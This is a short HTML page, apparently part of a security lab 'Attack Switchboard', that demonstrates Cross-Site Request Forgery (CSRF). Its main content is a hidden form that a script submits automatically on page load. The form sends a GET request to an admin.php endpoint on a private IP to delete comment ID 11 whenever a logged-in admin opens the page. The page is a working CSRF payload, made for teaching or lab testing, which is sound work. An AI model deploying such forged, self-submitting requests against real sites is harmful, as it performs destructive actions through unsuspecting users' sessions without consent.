<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8" />
  <title>CSRF Attack Demo</title>
  <style>
    /* Reset some default styles */
    * {
      box-sizing: border-box;
    }
    body {
      font-family: "Segoe UI", Tahoma, Geneva, Verdana, sans-serif;
      background-color: #fff5f5;
      color: #8b0000;
      margin: 0;
      padding: 40px 20px;
      display: flex;
      flex-direction: column;
      align-items: center;
      min-height: 100vh;
      text-align: center;
    }
    h1 {
      font-size: 2.8rem;
      margin-bottom: 20px;
      font-weight: 700;
      letter-spacing: 1.5px;
    }
    p {
      font-size: 1.15rem;
      max-width: 600px;
      margin: 15px 0 30px;
      line-height: 1.5;
    }
    strong {
      color: #b22222;
      font-weight: 700;
    }
    a {
      color: #b22222;
      text-decoration: none;
      font-weight: 600;
      border: 2px solid #b22222;
      padding: 8px 20px;
      border-radius: 6px;
      transition: background-color 0.3s ease, color 0.3s ease;
    }
    a:hover,
    a:focus {
      background-color: #b22222;
      color: #fff;
      outline: none;
    }
  </style>
</head>
<body>

  <h1>CSRF Attack Demo</h1>

  <p>This page simulates a Cross-Site Request Forgery (CSRF) attack by silently sending a request to delete a comment with ID = 11.</p>

  <!-- Simulate the attack -->
  <form action="http://192.168.74.146/sadik/admin.php" method="GET" id="csrfForm" style="display:none;">
    <input type="hidden" name="delete_comment" value="11" />
  </form>

  <script>
    // Automatically submit the form to simulate the CSRF attack
    document.getElementById('csrfForm').submit();
  </script>

  <p><strong>If the admin is logged in and visits this page, comment ID 11 will be deleted silently!</strong></p>

  <a href="attacks.html" aria-label="Back to Attack Switchboard">⬅ Back to Attack Switchboard</a>

</body>
</html>
